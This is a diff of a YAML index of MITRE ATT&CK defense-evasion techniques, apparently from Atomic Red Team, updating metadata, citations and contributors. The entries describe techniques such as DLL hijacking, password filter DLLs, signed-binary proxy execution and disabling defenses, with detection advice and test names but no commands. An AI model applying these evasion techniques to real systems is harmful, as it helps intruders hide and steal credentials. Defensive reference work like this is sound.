       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1497.001
     atomic_tests:
     - name: Detect Virtualization Environment (Windows)
@@ -3817,7 +3888,7 @@ defense-evasion:
         url: https://www.eurovps.com/blog/important-linux-log-files-you-must-be-monitoring/
         description: Marcel. (2018, April 19). 12 Critical Linux Log Files You Must
           be Monitoring. Retrieved March 29, 2020.
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-03-29T21:23:51.886Z'
       name: 'Indicator Removal on Host: Clear FreeBSD, Linux or Mac System Logs'
       description: |
         Adversaries may clear system logs to hide evidence of an intrusion. macOS and Linux both keep track of system or user-initiated actions via system logs. The majority of native system logging is stored under the <code>/var/log/</code> directory. Subfolders in this directory categorize logs by their related functions, such as:(Citation: Linux Logs)
@@ -3842,8 +3913,6 @@ defense-evasion:
       - 'File: File Deletion'
       - 'File: File Modification'
       - 'Command: Command Execution'
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1070.002
     atomic_tests: []
   T1218.004:
@@ -3872,7 +3941,7 @@ defense-evasion:
       - source_name: LOLBAS Installutil
         url: https://lolbas-project.github.io/lolbas/Binaries/Installutil/
         description: LOLBAS. (n.d.). Installutil.exe. Retrieved July 31, 2019.
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-03-11T18:47:52.603Z'
       name: 'Signed Binary Proxy Execution: InstallUtil'
       description: |-
         Adversaries may use InstallUtil to proxy execution of code through a trusted Windows utility. InstallUtil is a command-line utility that allows for installation and uninstallation of resources by executing specific installer components specified in .NET binaries. (Citation: MSDN InstallUtil) The InstallUtil binary may also be digitally signed by Microsoft and located in the .NET directories on a Windows system: <code>C:\Windows\Microsoft.NET\Framework\v<version>\InstallUtil.exe</code> and <code>C:\Windows\Microsoft.NET\Framework64\v<version>\InstallUtil.exe</code>.
@@ -3898,8 +3967,6 @@ defense-evasion:
       - Application control
       x_mitre_permissions_required:
       - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1218.004
     atomic_tests:
     - name: CheckIfInstallable method call
@@ -4508,18 +4575,17 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1574.001:
     technique:
-      modified: '2024-04-18T22:54:54.668Z'
+      modified: '2024-09-30T17:32:59.948Z'
       name: 'Hijack Execution Flow: DLL Search Order Hijacking'
       description: |-
         Adversaries may execute their own malicious payloads by hijacking the search order used to load DLLs. Windows systems use a common method to look for required DLLs to load into a program. (Citation: Microsoft Dynamic Link Library Search Order)(Citation: FireEye Hijacking July 2010) Hijacking DLL loads may be for the purpose of establishing persistence as well as elevating privileges and/or evading restrictions on file execution.
 
         There are many ways an adversary can hijack DLL loads. Adversaries may plant trojan dynamic-link library files (DLLs) in a directory that will be searched before the location of a legitimate library that will be requested by a program, causing Windows to load their malicious library when it is called for by the victim program. Adversaries may also perform DLL preloading, also called binary planting attacks, (Citation: OWASP Binary Planting) by placing a malicious DLL with the same name as an ambiguously specified DLL in a location that Windows searches before the legitimate DLL. Often this location is the current working directory of the program.(Citation: FireEye fxsst June 2011) Remote DLL preloading attacks occur when a program sets its current directory to a remote location such as a Web share before loading a DLL. (Citation: Microsoft Security Advisory 2269637)
 
-        Phantom DLL hijacking is a specific type of DLL search order hijacking where adversaries target references to non-existent DLL files.(Citation: Adversaries Hijack DLLs) They may be able to load their own malicious DLL by planting it with the correct name in the location of the missing module.
+        Phantom DLL hijacking is a specific type of DLL search order hijacking where adversaries target references to non-existent DLL files.(Citation: Hexacorn DLL Hijacking)(Citation: Adversaries Hijack DLLs) They may be able to load their own malicious DLL by planting it with the correct name in the location of the missing module.
 
         Adversaries may also directly modify the search order via DLL redirection, which after being enabled (in the Registry and creation of a redirection file) may cause a program to load a different DLL.(Citation: Microsoft Dynamic-Link Library Redirection)(Citation: Microsoft Manifests)(Citation: FireEye DLL Search Order Hijacking)
 
@@ -4535,8 +4601,8 @@ defense-evasion:
       - Travis Smith, Tripwire
       - Stefan Kanthak
       - Marina Liang
-      - Will Alexander
-      - Ami Holeston
+      - Ami Holeston, CrowdStrike
+      - Will Alexander, CrowdStrike
       x_mitre_deprecated: false
       x_mitre_detection: Monitor file systems for moving, renaming, replacing, or
         modifying DLLs. Changes in the set of DLLs that are loaded by a process (compared
@@ -4550,7 +4616,7 @@ defense-evasion:
       x_mitre_is_subtechnique: true
       x_mitre_platforms:
       - Windows
-      x_mitre_version: '1.2'
+      x_mitre_version: '1.3'
       x_mitre_data_sources:
       - 'File: File Modification'
       - 'Module: Module Load'
@@ -4576,6 +4642,10 @@ defense-evasion:
         description: Harbour, N. (2011, June 3). What the fxsst?. Retrieved November
           17, 2020.
         url: https://www.fireeye.com/blog/threat-research/2011/06/fxsst.html
+      - source_name: Hexacorn DLL Hijacking
+        description: Hexacorn. (2013, December 8). Beyond good ol’ Run key, Part 5.
+          Retrieved August 14, 2024.
+        url: https://www.hexacorn.com/blog/2013/12/08/beyond-good-ol-run-key-part-5/
       - source_name: Microsoft Security Advisory 2269637
         description: Microsoft. (, May 23). Microsoft Security Advisory 2269637. Retrieved
           March 13, 2020.
@@ -4603,7 +4673,6 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1574.001
     atomic_tests:
     - name: DLL Search Order Hijacking - amsi.dll
@@ -4672,7 +4741,7 @@ defense-evasion:
         elevation_required: true
   T1553.001:
     technique:
-      modified: '2022-11-08T14:00:00.188Z'
+      modified: '2022-10-21T19:30:58.414Z'
       name: 'Subvert Trust Controls: Gatekeeper Bypass'
       description: |-
         Adversaries may modify file attributes and subvert Gatekeeper functionality to evade user prompts and execute untrusted programs. Gatekeeper is a set of technologies that act as layer of Apple’s security model to ensure only trusted applications are executed on a host. Gatekeeper was built on top of File Quarantine in Snow Leopard (10.6, 2009) and has grown to include Code Signing, security policy compliance, Notarization, and more. Gatekeeper also treats applications running for the first time differently than reopened applications.(Citation: TheEclecticLightCompany Quarantine and the flag)(Citation: TheEclecticLightCompany apple notarization )
@@ -4768,7 +4837,6 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1553.001
     atomic_tests: []
   T1553.002:
@@ -4835,7 +4903,6 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1036.009:
     technique:
@@ -4900,11 +4967,10 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1222.001:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-04-21T12:27:04.900Z'
       name: 'File and Directory Permissions Modification: Windows File and Directory
         Permissions Modification'
       description: |-
@@ -4965,7 +5031,6 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1222.001
     atomic_tests:
     - name: Take ownership using takeown utility
@@ -5125,7 +5190,7 @@ defense-evasion:
         elevation_required: true
   T1574.014:
     technique:
-      modified: '2024-04-18T15:03:32.158Z'
+      modified: '2024-04-28T15:44:25.342Z'
       name: AppDomainManager
       description: "Adversaries may execute their own malicious payloads by hijacking
         how the .NET `AppDomainManager` loads assemblies. The .NET framework uses
@@ -5151,7 +5216,7 @@ defense-evasion:
         phase_name: defense-evasion
       x_mitre_contributors:
       - Thomas B
-      - Ivy Bostock
+      - Ivy Drexel
       x_mitre_deprecated: false
       x_mitre_detection: ''
       x_mitre_domains:
@@ -5193,7 +5258,6 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1218.007:
     technique:
@@ -5235,7 +5299,7 @@ defense-evasion:
         Adversaries may abuse msiexec.exe to proxy execution of malicious payloads. Msiexec.exe is the command-line utility for the Windows Installer and is thus commonly associated with executing installation packages (.msi).(Citation: Microsoft msiexec) The Msiexec.exe binary may also be digitally signed by Microsoft.
 
         Adversaries may abuse msiexec.exe to launch local or network accessible MSI files. Msiexec.exe can also execute DLLs.(Citation: LOLBAS Msiexec)(Citation: TrendMicro Msiexec Feb 2018) Since it may be signed and native on Windows systems, msiexec.exe can be used to bypass application control solutions that do not account for its potential abuse. Msiexec.exe execution may also be elevated to SYSTEM privileges if the <code>AlwaysInstallElevated</code> policy is enabled.(Citation: Microsoft AlwaysInstallElevated 2018)
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-04-19T17:33:16.346Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: 'Signed Binary Proxy Execution: Msiexec'
       x_mitre_detection: Use process monitoring to monitor the execution and arguments
@@ -5258,7 +5322,6 @@ defense-evasion:
       - Application control
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1218.007
     atomic_tests:
     - name: Msiexec.exe - Execute Local MSI file with embedded JScript
@@ -5663,31 +5726,7 @@ defense-evasion:
         name: command_prompt
   T1556.002:
     technique:
-      x_mitre_platforms:
-      - Windows
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_contributors:
-      - Vincent Le Toux
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--3731fbcd-0e43-47ae-ae6c-d15e510f0d42
-      type: attack-pattern
-      created: '2020-02-11T19:05:45.829Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1556.002
-        url: https://attack.mitre.org/techniques/T1556/002
-      - url: http://carnal0wnage.attackresearch.com/2013/09/stealing-passwords-every-time-they.html
-        description: Fuller, R. (2013, September 11). Stealing passwords every time
-          they change. Retrieved November 21, 2017.
-        source_name: Carnal Ownage Password Filters Sept 2013
-      - url: https://clymb3r.wordpress.com/2013/09/15/intercepting-password-changes-with-function-hooking/
-        description: Bialek, J. (2013, September 15). Intercepting Password Changes
-          With Function Hooking. Retrieved November 21, 2017.
-        source_name: Clymb3r Function Hook Passwords Sept 2013
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2024-08-21T16:16:18.271Z'
       name: 'Modify Authentication Process: Password Filter DLL'
       description: "Adversaries may register malicious password filter dynamic link
         libraries (DLLs) into the authentication process to acquire user credentials
@@ -5711,22 +5750,44 @@ defense-evasion:
         phase_name: defense-evasion
       - kill_chain_name: mitre-attack
         phase_name: persistence
+      x_mitre_contributors:
+      - Vincent Le Toux
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         Monitor for new, unfamiliar DLL files written to a domain controller and/or local computer. Monitor for changes to Registry entries for password filters (ex: <code>HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\Notification Packages</code>) and correlate then investigate the DLL files these files reference.
 
         Password filters will also show up as an autorun and loaded DLL in lsass.exe.(Citation: Clymb3r Function Hook Passwords Sept 2013)
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '2.0'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Windows
+      x_mitre_version: '2.1'
       x_mitre_data_sources:
       - 'Windows Registry: Windows Registry Key Modification'
       - 'File: File Creation'
       - 'Module: Module Load'
-      x_mitre_permissions_required:
-      - Administrator
-      - SYSTEM
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--3731fbcd-0e43-47ae-ae6c-d15e510f0d42
+      created: '2020-02-11T19:05:45.829Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1556/002
+        external_id: T1556.002
+      - source_name: Clymb3r Function Hook Passwords Sept 2013
+        description: Bialek, J. (2013, September 15). Intercepting Password Changes
+          With Function Hooking. Retrieved November 21, 2017.
+        url: https://clymb3r.wordpress.com/2013/09/15/intercepting-password-changes-with-function-hooking/
+      - source_name: Carnal Ownage Password Filters Sept 2013
+        description: Fuller, R. (2013, September 11). Stealing passwords every time
+          they change. Retrieved November 21, 2017.
+        url: http://carnal0wnage.attackresearch.com/2013/09/stealing-passwords-every-time-they.html
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1556.002
     atomic_tests:
     - name: Install and Register Password Filter DLL
@@ -5894,7 +5955,6 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1600.001:
     technique:
@@ -5920,7 +5980,7 @@ defense-evasion:
         url: https://community.cisco.com/t5/security-blogs/attackers-continue-to-target-legacy-devices/ba-p/4169954
         description: Omar Santos. (2020, October 19). Attackers Continue to Target
           Legacy Devices. Retrieved October 20, 2020.
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-10-21T22:36:22.369Z'
       name: Reduce Key Space
       description: |-
         Adversaries may reduce the level of effort required to decrypt data transmitted over the network by reducing the cipher strength of encrypted communications.(Citation: Cisco Synful Knock Evolution)
@@ -5943,8 +6003,6 @@ defense-evasion:
       - 'File: File Modification'
       x_mitre_permissions_required:
       - Administrator
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1070.003:
     technique:
@@ -6040,7 +6098,6 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1070.003
     atomic_tests:
     - name: Prevent Powershell History Logging
@@ -6086,60 +6143,71 @@ defense-evasion:
         name: powershell
   T1202:
     technique:
-      x_mitre_platforms:
-      - Windows
-      x_mitre_domains:
-      - enterprise-attack
+      modified: '2024-10-03T14:47:17.154Z'
+      name: Indirect Command Execution
+      description: |-
+        Adversaries may abuse utilities that allow for command execution to bypass security restrictions that limit the use of command-line interpreters. Various Windows utilities may be used to execute commands, possibly without invoking [cmd](https://attack.mitre.org/software/S0106). For example, [Forfiles](https://attack.mitre.org/software/S0193), the Program Compatibility Assistant (pcalua.exe), components of the Windows Subsystem for Linux (WSL), Scriptrunner.exe, as well as other utilities may invoke the execution of programs and commands from a [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059), Run window, or via scripts.(Citation: VectorSec ForFiles Aug 2017)(Citation: Evi1cg Forfiles Nov 2017)(Citation: Secure Team - Scriptrunner.exe)(Citation: SS64)(Citation: Bleeping Computer - Scriptrunner.exe)
+
+        Adversaries may abuse these features for [Defense Evasion](https://attack.mitre.org/tactics/TA0005), specifically to perform arbitrary execution while subverting detections and/or mitigation controls (such as Group Policy) that limit/prevent the usage of [cmd](https://attack.mitre.org/software/S0106) or file extensions more commonly associated with malicious payloads.
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: defense-evasion
       x_mitre_contributors:
       - Matthew Demaske, Adaptforward
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      - Liran Ravich, CardinalOps
+      x_mitre_deprecated: false
+      x_mitre_detection: 'Monitor and analyze logs from host-based detection mechanisms,
+        such as Sysmon, for events such as process creations that include or are resulting
+        from parameters associated with invoking programs/commands/files and/or spawning
+        child processes/network connections. (Citation: RSA Forfiles Aug 2017)'
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: false
+      x_mitre_platforms:
+      - Windows
+      x_mitre_version: '1.2'
+      x_mitre_data_sources:
+      - 'Command: Command Execution'
+      - 'Process: Process Creation'
+      x_mitre_defense_bypassed:
+      - Static File Analysis
+      - Application Control
       type: attack-pattern
       id: attack-pattern--3b0e52ce-517a-4614-a523-1bd5deef6c5e
       created: '2018-04-18T17:59:24.739Z'
-      x_mitre_version: '1.1'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
       external_references:
       - source_name: mitre-attack
-        external_id: T1202
         url: https://attack.mitre.org/techniques/T1202
+        external_id: T1202
+      - source_name: Bleeping Computer - Scriptrunner.exe
+        description: Bill Toulas. (2023, January 4). Hackers abuse Windows error reporting
+          tool to deploy malware. Retrieved July 8, 2024.
+        url: https://www.bleepingcomputer.com/news/security/hackers-abuse-windows-error-reporting-tool-to-deploy-malware/
       - source_name: Evi1cg Forfiles Nov 2017
-        url: https://twitter.com/Evi1cg/status/935027922397573120
         description: Evi1cg. (2017, November 26). block cmd.exe ? try this :. Retrieved
-          January 22, 2018.
+          September 12, 2024.
+        url: https://x.com/Evi1cg/status/935027922397573120
       - source_name: RSA Forfiles Aug 2017
-        url: https://community.rsa.com/community/products/netwitness/blog/2017/08/14/are-you-looking-out-for-forfilesexe-if-you-are-watching-for-cmdexe
         description: Partington, E. (2017, August 14). Are you looking out for forfiles.exe
           (if you are watching for cmd.exe). Retrieved January 22, 2018.
+        url: https://community.rsa.com/community/products/netwitness/blog/2017/08/14/are-you-looking-out-for-forfilesexe-if-you-are-watching-for-cmdexe
+      - source_name: Secure Team - Scriptrunner.exe
+        description: Secure Team - Information Assurance. (2023, January 8). Windows
+          Error Reporting Tool Abused to Load Malware. Retrieved July 8, 2024.
+        url: https://secureteam.co.uk/2023/01/08/windows-error-reporting-tool-abused-to-load-malware/
+      - source_name: SS64
+        description: SS64. (n.d.). ScriptRunner.exe. Retrieved July 8, 2024.
+        url: https://ss64.com/nt/scriptrunner.html
       - source_name: VectorSec ForFiles Aug 2017
-        url: https://twitter.com/vector_sec/status/896049052642533376
         description: vector_sec. (2017, August 11). Defenders watching launches of
-          cmd? What about forfiles?. Retrieved January 22, 2018.
-      x_mitre_deprecated: false
-      revoked: false
-      description: |-
-        Adversaries may abuse utilities that allow for command execution to bypass security restrictions that limit the use of command-line interpreters. Various Windows utilities may be used to execute commands, possibly without invoking [cmd](https://attack.mitre.org/software/S0106). For example, [Forfiles](https://attack.mitre.org/software/S0193), the Program Compatibility Assistant (pcalua.exe), components of the Windows Subsystem for Linux (WSL), as well as other utilities may invoke the execution of programs and commands from a [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059), Run window, or via scripts. (Citation: VectorSec ForFiles Aug 2017) (Citation: Evi1cg Forfiles Nov 2017)
-
-        Adversaries may abuse these features for [Defense Evasion](https://attack.mitre.org/tactics/TA0005), specifically to perform arbitrary execution while subverting detections and/or mitigation controls (such as Group Policy) that limit/prevent the usage of [cmd](https://attack.mitre.org/software/S0106) or file extensions more commonly associated with malicious payloads.
-      modified: '2022-05-24T14:00:00.188Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      name: Indirect Command Execution
-      x_mitre_detection: 'Monitor and analyze logs from host-based detection mechanisms,
-        such as Sysmon, for events such as process creations that include or are resulting
-        from parameters associated with invoking programs/commands/files and/or spawning
-        child processes/network connections. (Citation: RSA Forfiles Aug 2017)'
-      kill_chain_phases:
-      - kill_chain_name: mitre-attack
-        phase_name: defense-evasion
-      x_mitre_is_subtechnique: false
-      x_mitre_data_sources:
-      - 'Command: Command Execution'
-      - 'Process: Process Creation'
-      x_mitre_defense_bypassed:
-      - Static File Analysis
-      - Application Control
-      x_mitre_attack_spec_version: 2.1.0
+          cmd? What about forfiles?. Retrieved September 12, 2024.
+        url: https://x.com/vector_sec/status/896049052642533376
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1202
     atomic_tests:
     - name: Indirect Command Execution - pcalua.exe
@@ -6314,7 +6382,6 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1140
     atomic_tests:
     - name: Deobfuscate/Decode Files Or Information
@@ -6362,17 +6429,20 @@ defense-evasion:
         name: command_prompt
   T1562:
     technique:
-      modified: '2023-10-20T16:43:53.391Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: Impair Defenses
-      description: |-
+      description: |+
         Adversaries may maliciously modify components of a victim environment in order to hinder or disable defensive mechanisms. This not only involves impairing preventative defenses, such as firewalls and anti-virus, but also detection capabilities that defenders can use to audit activity and identify malicious behavior. This may also span both native defenses as well as supplemental capabilities installed by users and administrators.
 
-        Adversaries may also impair routine operations that contribute to defensive hygiene, such as blocking users from logging out of a computer or stopping it from being shut down. These restrictions can further enable malicious operations as well as the continued propagation of incidents.(Citation: Emotet shutdown)
+        Adversaries may also impair routine operations that contribute to defensive hygiene, such as blocking users from logging out, preventing a system from shutting down, or disabling or modifying the update process. Adversaries could also target event aggregation and analysis mechanisms, or otherwise disrupt these procedures by altering other system components. These restrictions can further enable malicious operations as well as the continued propagation of incidents.(Citation: Google Cloud Mandiant UNC3886 2024)(Citation: Emotet shutdown)
 
-        Adversaries could also target event aggregation and analysis mechanisms, or otherwise disrupt these procedures by altering other system components.
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: defense-evasion
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_contributors:
+      - Jamie Williams (U ω U), PANW Unit 42
+      - Liran Ravich, CardinalOps
       x_mitre_deprecated: false
       x_mitre_detection: |-
         Monitor processes and command-line arguments to see if security tools or logging services are killed or stop running. Monitor Registry edits for modifications to services and startup programs that correspond to security tools.  Lack of log events may be suspicious.
@@ -6381,15 +6451,17 @@ defense-evasion:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: false
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
-      - Office 365
       - IaaS
       - Linux
       - macOS
       - Containers
       - Network
-      x_mitre_version: '1.5'
+      - Identity Provider
+      - Office Suite
+      x_mitre_version: '1.6'
       x_mitre_data_sources:
       - 'File: File Modification'
       - 'Cloud Service: Cloud Service Disable'
@@ -6427,15 +6499,17 @@ defense-evasion:
       - source_name: mitre-attack
         url: https://attack.mitre.org/techniques/T1562
         external_id: T1562
+      - source_name: Google Cloud Mandiant UNC3886 2024
+        description: " Punsaen Boonyakarn, Shawn Chew, Logeswaran Nadarajan, Mathew
+          Potaczek, Jakub Jozwiak, and Alex Marvi. (2024, June 18). Cloaked and Covert:
+          Uncovering UNC3886 Espionage Operations. Retrieved September 24, 2024."
+        url: https://cloud.google.com/blog/topics/threat-intelligence/uncovering-unc3886-espionage-operations
       - source_name: Emotet shutdown
         description: The DFIR Report. (2022, November 8). Emotet Strikes Again – LNK
           File Leads to Domain Wide Ransomware. Retrieved March 6, 2023.
         url: https://thedfirreport.com/2022/11/28/emotet-strikes-again-lnk-file-leads-to-domain-wide-ransomware/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.2.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1562
     atomic_tests:
     - name: Windows Disable LSA Protection
@@ -6483,7 +6557,7 @@ defense-evasion:
           A Technical Survey Of Common And Trending Process Injection Techniques.
           Retrieved December 7, 2017.'
         source_name: Elastic Process Injection July 2017
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-10-18T12:22:50.800Z'
       name: Thread Execution Hijacking
       description: "Adversaries may inject malicious code into hijacked processes
         in order to evade process-based defenses as well as possibly elevate privileges.
@@ -6531,8 +6605,6 @@ defense-evasion:
       - Anti-virus
       x_mitre_permissions_required:
       - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1055.003
     atomic_tests:
     - name: Thread Execution Hijacking
@@ -6551,7 +6623,7 @@ defense-evasion:
         name: powershell
   T1036:
     technique:
-      modified: '2024-03-08T17:00:59.133Z'
+      modified: '2024-10-16T20:10:38.450Z'
       name: Masquerading
       description: |-
         Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
@@ -6567,7 +6639,7 @@ defense-evasion:
       - Felipe Espósito, @Pr0teus
       - Elastic
       - Bartosz Jerzman
-      - Goldstein Menachem
+      - Menachem Goldstein
       x_mitre_deprecated: false
       x_mitre_detection: |-
         Collect file hashes; file names that do not match their expected hash are suspect. Perform file monitoring; files with known names but in unusual locations are suspect. Likewise, files that are modified outside of an update or patch are suspect.
@@ -6592,6 +6664,7 @@ defense-evasion:
       - 'Process: Process Creation'
       - 'Image: Image Metadata'
       - 'Scheduled Job: Scheduled Job Metadata'
+      - 'User Account: User Account Creation'
       - 'File: File Metadata'
       - 'Scheduled Job: Scheduled Job Modification'
       - 'Command: Command Execution'
@@ -6609,8 +6682,8 @@ defense-evasion:
         external_id: T1036
       - source_name: Twitter ItsReallyNick Masquerading Update
         description: Carr, N.. (2018, October 25). Nick Carr Status Update Masquerading.
-          Retrieved April 22, 2019.
-        url: https://twitter.com/ItsReallyNick/status/1055321652777619457
+          Retrieved September 12, 2024.
+        url: https://x.com/ItsReallyNick/status/1055321652777619457
       - source_name: Elastic Masquerade Ball
         description: 'Ewing, P. (2016, October 31). How to Hunt: The Masquerade Ball.
           Retrieved October 31, 2016.'
@@ -6623,7 +6696,6 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1036
     atomic_tests:
     - name: System File Copied to Unusual Location
@@ -6671,7 +6743,7 @@ defense-evasion:
         name: powershell
   T1070.008:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-10-15T15:43:56.839Z'
       name: 'Email Collection: Mailbox Manipulation'
       description: "Adversaries may modify mail and mail application data to remove
         evidence of their activity. Email applications allow users and other programs
@@ -6708,9 +6780,8 @@ defense-evasion:
       - Linux
       - macOS
       - Windows
-      - Office 365
-      - Google Workspace
-      x_mitre_version: '1.1'
+      - Office Suite
+      x_mitre_version: '1.2'
       x_mitre_data_sources:
       - 'Application Log: Application Log Content'
       - 'File: File Deletion'
@@ -6748,9 +6819,8 @@ defense-evasion:
         url: https://www.microsoft.com/en-us/security/blog/2022/09/22/malicious-oauth-applications-used-to-compromise-email-servers-and-spread-spam/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1070.008
     atomic_tests:
     - name: Copy and Delete Mailbox Data on Windows
@@ -6791,7 +6861,7 @@ defense-evasion:
         elevation_required: true
   T1055:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-03-30T21:01:45.488Z'
       name: Process Injection
       description: "Adversaries may inject code into processes in order to evade process-based
         defenses as well as possibly elevate privileges. Process injection is a method
@@ -6894,7 +6964,6 @@ defense-evasion:
         url: http://www.chokepoint.net/2014/02/detecting-userland-preload-rootkits.html
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      spec_version: '2.1'
       identifier: T1055
     atomic_tests:
     - name: Shellcode execution via VBA
@@ -7306,7 +7375,7 @@ defense-evasion:
         elevation_required: true
   T1205:
     technique:
-      modified: '2022-11-08T14:00:00.188Z'
+      modified: '2022-10-19T23:08:40.603Z'
       name: Traffic Signaling
       description: |-
